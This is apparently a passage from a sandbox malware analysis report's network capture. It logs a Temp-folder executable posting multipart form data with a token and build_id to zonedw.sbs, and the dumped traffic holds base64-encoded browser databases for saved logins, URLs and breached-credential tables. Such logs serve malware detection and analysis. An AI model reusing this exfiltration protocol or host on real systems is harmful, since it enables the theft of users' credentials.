2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:54:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	50058	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:56 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----U3E3EC2VAAAIEUKFK6XB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 68733 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:54:56 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 Data Ascii: ------U3E3EC2VAAAIEUKFK6XBContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------U3E3EC2VAAAIEUKFK6XBContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------U3E3EC2VAAAIEUKFK6XBCont
2024-12-13 17:54:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:56 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
2024-12-13 17:54:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:56 UTC	3313	OUT	Data Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31 Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
2024-12-13 17:54:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:54:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:54:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	50060	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:57 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----Q16P8YU3EKFU3EKNYMGL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 51 31 36 50 38 59 55 33 45 4b 46 55 33 45 4b 4e 59 4d 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 51 31 36 50 38 59 55 33 45 4b 46 55 33 45 4b 4e 59 4d 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 51 31 36 50 38 59 55 33 45 4b 46 55 33 45 4b 4e 59 4d 47 4c 0d 0a 43 6f 6e 74 Data Ascii: ------Q16P8YU3EKFU3EKNYMGLContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------Q16P8YU3EKFU3EKNYMGLContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------Q16P8YU3EKFU3EKNYMGLCont
2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
